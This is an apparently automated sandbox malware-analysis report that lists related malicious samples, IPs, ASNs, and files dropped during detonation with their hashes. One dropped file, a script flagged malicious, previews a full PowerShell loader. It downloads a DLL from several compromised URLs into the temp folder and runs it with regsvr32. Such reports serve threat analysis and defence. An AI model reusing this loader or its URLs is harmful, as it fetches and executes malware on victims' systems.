                                                                                                  • Successful, ratio: 83.2% (good quality ratio 69.2%)
                                                                                                  • Quality average: 62.8%
                                                                                                  • Quality standard deviation: 36.5%
                                                                                                  HCA Information:
                                                                                                  • Successful, ratio: 100%
                                                                                                  • Number of executed functions: 28
                                                                                                  • Number of non-executed functions: 111
                                                                                                  Cookbook Comments:
                                                                                                  • Found application associated with file extension: .lnk
                                                                                                  • Adjust boot time
                                                                                                  • Enable AMSI

                                                                                                  Warnings

                                                                                                  • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, wuapihost.exe
                                                                                                  • Excluded IPs from analysis (whitelisted): 23.211.4.86, 173.222.108.226, 173.222.108.210, 20.54.110.249
                                                                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, wu-bg-shim.trafficmanager.net, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 6424 because it is empty
                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 6624 because it is empty
                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                  Simulations

                                                                                                  Behavior and APIs

                                                                                                  TimeTypeDescription
                                                                                                  09:46:17API Interceptor90x Sleep call for process: powershell.exe modified
                                                                                                  09:46:49API Interceptor10x Sleep call for process: svchost.exe modified
                                                                                                  09:47:39API Interceptor1x Sleep call for process: MpCmdRun.exe modified

                                                                                                  Joe Sandbox View / Context

                                                                                                  IPs

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                  151.106.112.1960AgOx7tF.dllGet hashmaliciousBrowse
                                                                                                    byHH6teCvy.dllGet hashmaliciousBrowse
                                                                                                      ONU182453222ZW.xlsGet hashmaliciousBrowse
                                                                                                        Scan 2022.22.04_1811.xlsGet hashmaliciousBrowse
                                                                                                          Electronic form Dt 04.22.2022, USA.xlsGet hashmaliciousBrowse
                                                                                                            H5Xm3tm5xJu.dllGet hashmaliciousBrowse
                                                                                                              documentaci#U00f3n 2304.xlsGet hashmaliciousBrowse
                                                                                                                8JW5bVpPN7.dllGet hashmaliciousBrowse
                                                                                                                  spz1CAy4z3.dllGet hashmaliciousBrowse
                                                                                                                    HikAIwl0G9.dllGet hashmaliciousBrowse
                                                                                                                      38JIIzd104.dllGet hashmaliciousBrowse
                                                                                                                        51RYFNOQRv.dllGet hashmaliciousBrowse
                                                                                                                          0By3zFRlZJ.dllGet hashmaliciousBrowse
                                                                                                                            dullFdHVro.dllGet hashmaliciousBrowse
                                                                                                                              WwDwyd9HeL.dllGet hashmaliciousBrowse
                                                                                                                                uSUsq2GKdB.dllGet hashmaliciousBrowse
                                                                                                                                  g9uodRJoRr.dllGet hashmaliciousBrowse
                                                                                                                                    3SgwqWzcHo.dllGet hashmaliciousBrowse
                                                                                                                                      rkQJol1qYT.dllGet hashmaliciousBrowse
                                                                                                                                        s3qAM53Sfc.dllGet hashmaliciousBrowse
                                                                                                                                          110.232.117.1860AgOx7tF.dllGet hashmaliciousBrowse
                                                                                                                                            byHH6teCvy.dllGet hashmaliciousBrowse
                                                                                                                                              ONU182453222ZW.xlsGet hashmaliciousBrowse
                                                                                                                                                Scan 2022.22.04_1811.xlsGet hashmaliciousBrowse
                                                                                                                                                  Electronic form Dt 04.22.2022, USA.xlsGet hashmaliciousBrowse
                                                                                                                                                    H5Xm3tm5xJu.dllGet hashmaliciousBrowse
                                                                                                                                                      documentaci#U00f3n 2304.xlsGet hashmaliciousBrowse
                                                                                                                                                        8JW5bVpPN7.dllGet hashmaliciousBrowse
                                                                                                                                                          spz1CAy4z3.dllGet hashmaliciousBrowse
                                                                                                                                                            HikAIwl0G9.dllGet hashmaliciousBrowse
                                                                                                                                                              38JIIzd104.dllGet hashmaliciousBrowse
                                                                                                                                                                51RYFNOQRv.dllGet hashmaliciousBrowse
                                                                                                                                                                  0By3zFRlZJ.dllGet hashmaliciousBrowse
                                                                                                                                                                    dullFdHVro.dllGet hashmaliciousBrowse
                                                                                                                                                                      WwDwyd9HeL.dllGet hashmaliciousBrowse
                                                                                                                                                                        uSUsq2GKdB.dllGet hashmaliciousBrowse
                                                                                                                                                                          g9uodRJoRr.dllGet hashmaliciousBrowse
                                                                                                                                                                            3SgwqWzcHo.dllGet hashmaliciousBrowse
                                                                                                                                                                              rkQJol1qYT.dllGet hashmaliciousBrowse
                                                                                                                                                                                s3qAM53Sfc.dllGet hashmaliciousBrowse

                                                                                                                                                                                  Domains

                                                                                                                                                                                  No context

                                                                                                                                                                                  ASNs

                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                  PLUSSERVER-ASN1DE0AgOx7tF.dllGet hashmaliciousBrowse
                                                                                                                                                                                  • 151.106.112.196
                                                                                                                                                                                  byHH6teCvy.dllGet hashmaliciousBrowse
                                                                                                                                                                                  • 151.106.112.196
                                                                                                                                                                                  ONU182453222ZW.xlsGet hashmaliciousBrowse
                                                                                                                                                                                  • 151.106.112.196
                                                                                                                                                                                  Scan 2022.22.04_1811.xlsGet hashmaliciousBrowse
                                                                                                                                                                                  • 151.106.112.196
                                                                                                                                                                                  Electronic form Dt 04.22.2022, USA.xlsGet hashmaliciousBrowse
                                                                                                                                                                                  • 151.106.112.196
                                                                                                                                                                                  ANTIMETHODIC.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 78.138.120.66
                                                                                                                                                                                  H5Xm3tm5xJu.dllGet hashmaliciousBrowse
                                                                                                                                                                                  • 151.106.112.196
                                                                                                                                                                                  documentaci#U00f3n 2304.xlsGet hashmaliciousBrowse
                                                                                                                                                                                  • 151.106.112.196
                                                                                                                                                                                  8JW5bVpPN7.dllGet hashmaliciousBrowse
                                                                                                                                                                                  • 151.106.112.196
                                                                                                                                                                                  spz1CAy4z3.dllGet hashmaliciousBrowse
                                                                                                                                                                                  • 151.106.112.196
                                                                                                                                                                                  HikAIwl0G9.dllGet hashmaliciousBrowse
                                                                                                                                                                                  • 151.106.112.196
                                                                                                                                                                                  38JIIzd104.dllGet hashmaliciousBrowse
                                                                                                                                                                                  • 151.106.112.196
                                                                                                                                                                                  51RYFNOQRv.dllGet hashmaliciousBrowse
                                                                                                                                                                                  • 151.106.112.196
                                                                                                                                                                                  0By3zFRlZJ.dllGet hashmaliciousBrowse
                                                                                                                                                                                  • 151.106.112.196
                                                                                                                                                                                  dullFdHVro.dllGet hashmaliciousBrowse
                                                                                                                                                                                  • 151.106.112.196
                                                                                                                                                                                  WwDwyd9HeL.dllGet hashmaliciousBrowse
                                                                                                                                                                                  • 151.106.112.196
                                                                                                                                                                                  uSUsq2GKdB.dllGet hashmaliciousBrowse
                                                                                                                                                                                  • 151.106.112.196
                                                                                                                                                                                  g9uodRJoRr.dllGet hashmaliciousBrowse
                                                                                                                                                                                  • 151.106.112.196
                                                                                                                                                                                  3SgwqWzcHo.dllGet hashmaliciousBrowse
                                                                                                                                                                                  • 151.106.112.196
                                                                                                                                                                                  rkQJol1qYT.dllGet hashmaliciousBrowse
                                                                                                                                                                                  • 151.106.112.196
                                                                                                                                                                                  AS-26496-GO-DADDY-COM-LLCUSUPDATED SOA.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 43.255.154.57
                                                                                                                                                                                  PO 12209999.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                  • 160.153.78.2
                                                                                                                                                                                  PO 22209677.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                  • 160.153.78.2
                                                                                                                                                                                  bank notice.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 184.168.102.151
                                                                                                                                                                                  Quotation.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 148.66.136.2
                                                                                                                                                                                  phantom.x86Get hashmaliciousBrowse
                                                                                                                                                                                  • 148.72.226.77
                                                                                                                                                                                  X_543738605.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                  • 72.167.38.213
                                                                                                                                                                                  X_543738605.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                  • 72.167.38.213
                                                                                                                                                                                  AO_95923068.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                  • 72.167.38.213
                                                                                                                                                                                  Swift Copy.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 148.66.136.2
                                                                                                                                                                                  AO_95923068.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                  • 72.167.38.213
                                                                                                                                                                                  https://s3.amazonaws.com/manageyourparcel14/2.htmlGet hashmaliciousBrowse
                                                                                                                                                                                  • 97.74.94.216
                                                                                                                                                                                  https://joodline.com/ufw/RSByPTulJI.zipGet hashmaliciousBrowse
                                                                                                                                                                                  • 72.167.126.225
                                                                                                                                                                                  SOA.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 107.180.46.149
                                                                                                                                                                                  DB_DHL_AWB_001833022AD.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 198.71.233.167
                                                                                                                                                                                  PO#801644.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 184.168.102.151
                                                                                                                                                                                  fhNQhw4dRqGet hashmaliciousBrowse
                                                                                                                                                                                  • 198.12.169.176
                                                                                                                                                                                  PO-AO XIANG FZCO.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 173.201.181.36
                                                                                                                                                                                  IvEAo3r7kT.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 166.62.76.161
                                                                                                                                                                                  https://asrar.edu.kw/ufw/hcS/PRq/29R/Pm4CD8N.zipGet hashmaliciousBrowse
                                                                                                                                                                                  • 107.180.21.53

                                                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                                                  No context

                                                                                                                                                                                  Dropped Files

                                                                                                                                                                                  No context

                                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0x3867dcc8, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):786432
                                                                                                                                                                                  Entropy (8bit):0.250691470186048
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:E+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:7SB2nSB2RSjlK/+mLesOj1J2
                                                                                                                                                                                  MD5:864D3C9861B37575EF5982560433A06D
                                                                                                                                                                                  SHA1:76EE1F8FE65BB5703BB2D988B9B80DCFF76D0728
                                                                                                                                                                                  SHA-256:338C311D846994BE7F4B2DAA04A036DB612AEF295EE576D0C4AA54DFD66D19C6
                                                                                                                                                                                  SHA-512:5B6D8884BF581B9C6DD8D12FD0C6AF886470135D056C6690B17B58CF445FCC38BC230EAA74BD9687C1F68BE9A4E21EBB31F19ECC4C949E3EA7889607D4486359
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:8g..... ................e.f.3...w........................&..........w..1....z1.h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w.......................................................................................................................................................................................................................................0f.1....z1y....................1....z1.........................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                  File Type:Microsoft Cabinet archive data, 60992 bytes, 1 file
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):60992
                                                                                                                                                                                  Entropy (8bit):7.994637486921971
                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                  SSDEEP:1536:1ccLOuSwR3W8vM1pjd8MpGwIMESUnWWiidx34:1ccLm6W8vUBCMpGwIMEDnqe4
                                                                                                                                                                                  MD5:637481DF32351129E60560D5A5C100B5
                                                                                                                                                                                  SHA1:A46AEE6E5A4A4893FBA5806BCC14FC7FB3CE80AE
                                                                                                                                                                                  SHA-256:1F1029D94CA4656A577D554CEDD79D447658F475AF08620084897A5523587052
                                                                                                                                                                                  SHA-512:604BFD0A78A57DFDDD45872803501AD89491E37E89E0778B0F13644FA9164FF509955A57469DFDD65A05BBEDAF0ACB669F68430E84800D17EFE7D360A70569E3
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:MSCF....@.......,...................I.......]t........VT+V .authroot.stl.K.&.4..CK..<Tk...c_.d....A.K.....Y.f.]%.BJ$RHnT..i/.]...s.H..k....n.3.......S..9.s.....3H$M.%...h..qV.=M..].4.I.....V:F.h]......B`..,......D.0a....H.G..:...XF.F..MJ`.H. 7......._....lE..he.4|.?....h...7..P~8.|.,. .....#0+..o...g...}U2n............'.Dp.;..f..ljX.Dx..r<'.1RA3B0<..D.z...)D|..8<..c..'XH..I,.Y..d.b.".A......cm_nVb[w..rDp.....y%.|7...^.#.#[...3~3.g..CN......k;...C.`.C.iB.`-...|.....y.(....]~`>... .p..q<..g..i...y..|.....I...T8B.Ag#U......G.9+.x6..a.c.3...X.4E........N..:X.F...S...X...ku..O.J...)Z....PAk..%.+..n..z<.2.......w2c@.((*.J.dN...\!o@.........0..3.`.DU.3.%0.G...4Sv...5.T.?.......p..".........|..j.4.H...g.(...^.....w.......|...#..og)>..t.}.k.G|.2K.5..ik.......0..~ ">......A...ku..d..Y..@D....YO.{.9..:)..L..=D..O...6.n....ui<..w.[O...P>..y.L....J......r.!.5.u.3..-`..r,aH.B <..t..8.c.{u.<'.3.........u.3..[W.....2...$..eAo.m...w...............g$m.`..

                                                                                                                                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:modified
                                                                                                                                                                                  Size (bytes):330
                                                                                                                                                                                  Entropy (8bit):3.162471063763029
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:6:kKhE/bN+SkQlPlEGYRMY9z+4KlDA3RUeAxf1:K/UkPlE99SNxAhUekf1
                                                                                                                                                                                  MD5:5F0E1EC9544C838E2F54915BBBACED0C
                                                                                                                                                                                  SHA1:AE6F181548F49C4E2CC2C8F74184FB304E182FA6
                                                                                                                                                                                  SHA-256:FF8C160C74DB269E9922ED91C844D28997B8D65EBBB9797C344B7AEF952356AB
                                                                                                                                                                                  SHA-512:D0E582F7E8A7CC87DE8017438627C5C2EF2684AF43B54DCB75C02FC69BAFBEE26238360699AEA80C9546289410F94DD844013707F60166ACB9CBCA9D89E337EF
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:p...... ........=..=.Y..(....................................................... ........%,.)......(...........@...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".8.0.2.5.2.c.e.6.b.2.2.9.d.8.1.:.0."...

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):11606
                                                                                                                                                                                  Entropy (8bit):4.884004042663719
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:h9smd3YrKkGdcU6CkVsm5emla9sm5ib4q4dVsm5emdjxoeRjp5Kib4n2Ca6pZlb4:ySib4q4dvEib42opbjvwRjdvRnrkjh4v
                                                                                                                                                                                  MD5:BD615E1A2BC83828E536E020BD2D7DE9
                                                                                                                                                                                  SHA1:340AF08B8BB60B52442FFE05FF8277C4276C8320
                                                                                                                                                                                  SHA-256:B5285E108F6ED9D942F56E840A5DFCA938E65FBC64A18729DFD96BE71D878416
                                                                                                                                                                                  SHA-512:90EC9D0E15D0D7609963BC7E19A2DE7B1D8B068460D2A0AA666D94E84360116868D19417F5C8D87E82D917CF6BC8BFFDEA8CDC73A86CD44419FFACA1E261D0E6
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:PSMODULECACHE.....7.t8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope.........w.e...a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Uninstall-Package........Set-PackageSource........Get-PackageSource........Find-Package........Register-PackageSource........Import-PackageProvider...........e...[...C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Set-PackageSource........Unregister-PackageSource........Get-PackageSource........Install-Package........Save-Package........Get-Package...

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):64
                                                                                                                                                                                  Entropy (8bit):0.9260988789684415
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:Nlllulb/lj:NllUb/l
                                                                                                                                                                                  MD5:13AF6BE1CB30E2FB779EA728EE0A6D67
                                                                                                                                                                                  SHA1:F33581AC2C60B1F02C978D14DC220DCE57CC9562
                                                                                                                                                                                  SHA-256:168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
                                                                                                                                                                                  SHA-512:1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:@...e................................................@..........

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\GMOWDTRfIJ.xtq

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):473088
                                                                                                                                                                                  Entropy (8bit):6.839342414681294
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12288:cYI/EvSkO2GGIBaUPPGJc1jExt+9NuI6I78:RI/EoxBaQZExt+9Nu
                                                                                                                                                                                  MD5:63935105CF001C980B664DB3BEB124FB
                                                                                                                                                                                  SHA1:A44DF97A8AA1EDEA9713A5B9B4BEF3B3BB2ECA6A
                                                                                                                                                                                  SHA-256:2D583F9460C8224531E69BF226AAA55D983898082B59BC1995CABBB486572CA7
                                                                                                                                                                                  SHA-512:FFAE8AFA0CC192228E65A31D69A2F07CAFFFBCF8D72D79C4581AC43468DB7AB1E4F2289707E3C50D90D9D722337516D624AF264990C141B2D21D67620F2C5205
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........M.u.,.&.,.&.,.&...&.,.&...&.,.&.,.&...&.~.&D,.&.~.&.,.&.~.&K,.&.~.&.,.&.~.&.,.&.~.&.,.&Rich.,.&........................PE..d...2.gb.........." .........:..........................................................................................................O...............L........3..........................................................................x...@....................text...|........................... ..`.rdata..............................@..@.data............,..................@....pdata...3.......4...*..............@..@.rsrc...L............^..............@..@.reloc..j).......*..................@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2j1q0koq.4hm.psm1

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:1

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ap2dulp.pbi.ps1

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:1

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nxgt44qj.hgl.ps1

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:1

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y5gz3qiz.unf.psm1

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:1

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:Little-endian UTF-16 Unicode text, with very long lines, with CR line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):898
                                                                                                                                                                                  Entropy (8bit):3.8218645015810377
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:QCYOZohdiOgUjparqvWbzPi/F1uCOE19kLlF6z:QOZpObgHa/HuCOE1YlS
                                                                                                                                                                                  MD5:3F6B9A3C25A96DAC461257368B47EC82
                                                                                                                                                                                  SHA1:D14A5D0FD3F7565796AC3DEC993C68A77793FA6E
                                                                                                                                                                                  SHA-256:E1388ABCFEA4474662917EE606C959651D8D9F54A67B6FD89643D06EC25A0F50
                                                                                                                                                                                  SHA-512:59803AA3398E6CB5370D3E620C2BD0F12B314561BD3A95676EAB8148C447828343B3FB192D58605EB2B1A7959B0C473FAC8062743B7D262795BAEF3868542235
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Preview:..$.P.r.o.g.r.e.s.s.P.r.e.f.e.r.e.n.c.e.=.".S.i.l.e.n.t.l.y.C.o.n.t.i.n.u.e.".;.$.l.i.n.k.s.=.(.".h.t.t.p.:././.f.o.c.u.s.m.e.d.i.c.a...i.n./.f.m.l.i.b./.I.x.B.A.B.M.h.0.I.2.c.L.M.3.q.q.1.G.V.v./.".,.".h.t.t.p.:././.d.e.m.o.3.4...c.k.g...h.k./.s.e.r.v.i.c.e./.h.h.M.Z.r.f.C.7.M.n.m.9.J.D./.".,.".h.t.t.p.:././.c.o.l.e.g.i.o.u.n.a.m.u.n.o...e.s./.c.g.i.-.b.i.n./.E./.".,.".h.t.t.p.:././.c.i.p.r.o...m.x./.p.r.e.n.s.a./.s.i.Z.P.6.9.r.B.F.m.i.b.D.v.u.T.P.1.L./.".,.".h.t.t.p.:././.f.i.l.m.m.o.g.z.i.v.o.t.a...r.s./.S.p.r.y.A.s.s.e.t.s./.g.D.R./.".,.".h.t.t.p.s.:././.c.r.e.e.m.o...p.l./.w.p.-.a.d.m.i.n./.Z.K.S.1.D.c.d.q.u.U.T.4.B.b.8.K.b./.".).;.f.o.r.e.a.c.h. .(.$.u. .i.n. .$.l.i.n.k.s.). .{.t.r.y. .{.I.W.R. .$.u. .-.O.u.t.F.i.l.e. .$.e.n.v.:.T.E.M.P./.G.M.O.W.D.T.R.f.I.J...x.t.q.;.R.e.g.s.v.r.3.2...e.x.e. .$.e.n.v.:.T.E.M.P./.G.M.O.W.D.T.R.f.I.J...x.t.q.;.b.r.e.a.k.}. .c.a.t.c.h. .{. .}.}.....

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1d55cdc72d314492.customDestinations-ms (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):4519
                                                                                                                                                                                  Entropy (8bit):3.8167704602295203
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:OBrEF5pQjpLvQInJor8O4SogZoV1onJor8O4SogZoVxH:grEFgFLv9n+hHqWn+hHqx
                                                                                                                                                                                  MD5:0CED9A53B0923DFB36595D89FD519B97
                                                                                                                                                                                  SHA1:8F9E88294C1D2EB741FD28B687AB5B98218CA315
                                                                                                                                                                                  SHA-256:7763B99548C0DDCDC2F70E6019357460E85E3945A62E48E09540CA3DE87525E9
                                                                                                                                                                                  SHA-512:F37950D321569EFE0DEF40D0F01F9320FAB742D68BFDFA1AD7D7A7758B5C4430022D2A87CF0760AD0ECB953D446E0E26A67C1E0A2F8AD52704D47ADC9A3A07ED
                                                                                                                                                                                  Malicious:false
